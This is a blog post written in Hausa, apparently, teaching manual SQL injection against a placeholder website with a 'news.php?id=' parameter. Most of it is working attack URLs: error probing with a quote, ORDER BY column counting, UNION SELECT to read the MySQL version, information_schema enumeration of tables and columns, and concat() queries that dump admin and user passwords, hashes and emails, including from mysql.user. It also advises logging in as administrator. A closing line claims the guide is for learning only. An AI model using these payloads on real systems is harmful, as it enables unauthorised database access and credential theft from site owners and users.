Tuesday, November 8, 2016

[Sql] Yanda Zaka Yi Manual Sql Injection Wajan Hacking Din Ko Website

Barkan Mu Da Kara Haduwa Daku A Wannan Sabon Bayani Mai Take Manual Sql Injection .

A wannan Bayani Zaka Ji Yanda Zaka Yi Sql Injection Ba Tare Da Kayi Amfani Da Wani Software Ba da Hannu Zaka Yi [Manual] Kawai Abin Da Nake Nema agurinka Mai Karatu Shine Natsuwa Shine Zaka Fahimci Ina Na Nufa a wanna bayani.
Zamu Fara jawabi.....


Mene Sql Injection ?Sql injection Yana Daya Da ka cikin Vulnerability Wanda yake Gama-gari wajan amfani dashi A Web Applications. A takaice Dai Yana Bama Mai Hari Ya sami Dama zuwa ko wucewa cikin database query a url kuma kasami damar Samu Wasu Manya Bayanai a cikin Web applications.


BARI MUFARA
Nemo Vulnerable site bari mu kamanta cewa mun sami Vulnerable site Yanzu http://www.site.com/news.php?id=5
Yanzu sabi da Mu tabbatar cewa Mun Sami Vulnerable site sai mu kara ' idan ka kara wannan ' kaga Url din zai koma Haka
http://www.site.com/news.php?id=5'

Idan Ya nuna Maka Matsala Makamancin Kamar Haka
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right" ko wanda yaso yai kama da wannan wanda yake bayyana cewa dai Vulnerable shikenan


Nemo Numban Column
Zuwa Nemo Numba Na Column Din Sai Munyi Amfani Da Wannan Kalmomin [color=red]ORDER BY [kara wa'inna Kalmomin yana gaya ma Database din cewa a sanya sakamakon a cikin tsari ba wai ya harde sakamakonba].


Ya zaka yi amfani dashi ?
Amsa: Gaskiyan magana zamuyi ta gwadawane harsai mun samu sakamako cewa akwai Error
http://www.site.com/news.php?id=5 order by 1-- babu error
http://www.site.com/news.php?id=5 order by 2-- babu error
http://www.site.com/news.php?id=5 order by 3-- babu error
http://www.site.com/news.php?id=5 order by 4-- akwai error [ Idan akwai error zai nuna maka sako kamar haka :Unknown column '4' in 'order clause' kokuma wani abu maka mancin haka ..]


Ya zamanto yana da Column 3 sabida mun sami error a 4


Duba Amfanin UNION
Ta hanyar amfanida UNION, zaka iya zaban Data dayawa a zancen ko Kalmomin Sql
Saboda Haka Muna Da Wannan http://www.site.com/news.php?id=5 union all select 1,2,3-- [Mun riga mun gano cewa numba din column din shine 3, a sashin bayanina na biyu] Idan muka ga Wasu Yan Numba.


Misali: 1 kokuma 2 kokuma 3.. Idan ka ga Wa inna Numba din toUNION aikin yana kyau.

Dubo version din MySQL
Bari muce mun sami numba 2 ya nuna a screen, Yanzu neman Version din zamuyi kenan kawai..


Sai Mu Canza Numba 2 din ,da @@version kokuma version() idan ka canza zaka sami wani abu kamar haka 4.1.33-log ko kuma 5.0.45 ko kuma wani dabban amma kuma maka mancin wanda nabada.


Ga yanda Yakamata ace Url din yake http://www.site.com/news.php?id=5 union all select 1,@@version,3-- Idan kasami Matsala wajan Sanya Wanna code din Karda ka Damu ai tunda kana wannan shafin ai komai zai zo da sauki Inshall ALLAHU..


Idan kasami error kamar haka : "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." Yanda Zamu Warware Matsalar abinda za muyi shine kawai muyi Convert ()
Misali: http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3-- kokuma tare da Hex kokuma babu hex kamar haka http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3-- Daga nan Zaka Sami version din MySQL


Yanda Zaka Samo Tables Da kuma Columns
Toh idan version din MySQL 5 (misali 4.1.33, 4.1.12...) Zan yi Muku bayani Kawai kuci gaba da Karanta wa...

Dole sai mun cinka Tables Da Kuma Columns Yawanci lokuta.Tables Din da aka fi Amfani Dashi user/s, admin/s, member/s...

Columns din da aka fi Amfani Dashi sune username, user, usr, user_name, password, pass, passwd, pwd... Da dai sauran su Idan nace Zan Sa Bayani a URL ..

Zai koma kamar haka kenan http://www.site.com/news.php?id=5 union all select 1,2,3 from admin

[Yanzu Munga Numba 2 a screen din ya nuna kamar yanda ya nuna A dacan...Da kyau haka muke So...

A cigaba da gashi]
Yanzu Mun fahimci cewa akwai Admin Table [Exist] Yanzu saikuma duba sunayen columns din http://www.site.com/news.php?id=5 union all select 1,username,3 from admin [idan kasamu error sai ka gwada dayan sunan column din] Za Kuga Username Ya bayyana a Screen.

Misali:- Admin, ko kuma Super admin da sauran su....
Yanzu domin muga akwai password http://www.site.com/news.php?id=5 union all select 1,password,3 from admin [idan kasamu error sai ka gwada dayan sunan column din] Za Kaga Password dinka a plain-text ko kuma hash...

Ya danganci yanda aka saita database.
Misali: md5 hash, mysql hash, sha1...
Ya kamata ace muka rashe Query din muko... inaga Zamu iya amfani Da Concat () [sabida yana hade da STRINGS]

Misali:- http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin Ina so ku fahimci wani abu anan, Nayi amfani da 0x3a,shi a hex yake [ sabida haka 0x3a shi hex value din Column ne] http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin Yanzu zamu ga Username:password ya bayyana a Screen misali: admin:admin ko kuma admin:some hash, Idan kasamu Wa inna Zaka iya shiga a Matsayi Admin ko wasu Super User.

Idan ka kasa cinkan asalin Sunan table, Zaka iya gwada wannan a kowanna Lokaci Mysql.user [Default].. Yana da username da password Columns...

Misali: http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user

MySQL 5
Idan baku manta ba nace muku zan dawo in muku bayani akan yanda zaku Sami Sunan Tables da Sunan Columns a MySQL 5...

A wannan muna Nema information_schema. Yana ajiye Table da kuma Columns a database. Domin nemo Table mun kan yi amfani da table_name da kuma information_schema.tables.

Misali:- http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables A wanna karnin Muna canza numba 2 zuwa table_name ,domin Table din farko daga information_schema.tables ya bayyana a Screen.

Yanzu dole ne sai mun kara LIMIT a karshen query domin samin Jerin Tables...

Misali: http:// www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1 Ku fahimci dalilin dana sanya 0,1 (Zai taimaka wajen Samin Saka makon ) Daga Yanzu idan kana son ka bude table na biyu sai ka canza 0,1 Zuwa limit 1,1

Misali:- http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1 Table na biyu ya bayyana, Sai kayi a Table na Uku kamar 2.1 http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1 ka cigaba da yi Harsai ka Samo Abu kamar : db_admin, poll_user, auth, auth_user.

Domin Samun sunan Columns Din Hanyar na riga nayi bayani iri daya ne da wanda na bada.. Anan Muna amfani da Columns_name da kuma information_schema.columns. Wannan Hanyar iri daya ne Da misalai dana bada a sama.

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1

Farkon Column din zai bayyana [Displayed]. Na biyu [Muna canza LIMIT 0,1 zuwa limit 1,1)

Misali:- http://www.site.com/news.php?id=5 union all select 1,column_name,3 from
information_schema.columns limit 1,1

Column na biyu zai bayyana ,karka damu ka cigaba harsai ka samu abu kamar username,user,login, password, pass, passwd da sauran su......

Idan kana Son sunan columns ya bayyana na wani Kayattan Table [Specific Table ] kai amfani da wannnan query din...

Bari muyi misali ace Mun Sami Table "Users".
Misali: http://www.site.com/news.php?id=5 union all select 1,column_name,3 from
information_schema.columns where table_name='users' Ta hanyar amfani kara Sanya LIMIT za mu iya duba duk list din column na table,Yanzu domin kara Duk aiki bari mu hada dukkan query din sai mutum ya sami User da kuma password.

http://www.site.com/news.php?id=5 union all select 1,concat
(user,0x3a,pass,0x3a,email) from users

Abinda Muke da shi anan shine:- user:pass:email

Misali:- admin:hash:whatever@blabla.com

SHARADI:
Banyi Wannan Bayanin Domin Kaje Kacuci Waniba Ko Kazalunchi Waniba, Idan Kata6a Kayan Wani Ko Kayan Gwamnati Kayi 6arna To Babu Ruwana Kada Kacema Kasanni...

Nayisane Domin Il-mantarwa Kadai.....

Asha_Shagalina Daga.....
★★★★★★★★★★★★★★★★★★★★★★★
Strygwyr | Cybersadiq
★★★★★★★★★★★★★★★★★★★★★★★

Labels: ,

posted by kjnb @ November 08, 2016   0 Comments

0 Comments:

Post a Comment

Subscribe to Post Comments [Atom]

<< Home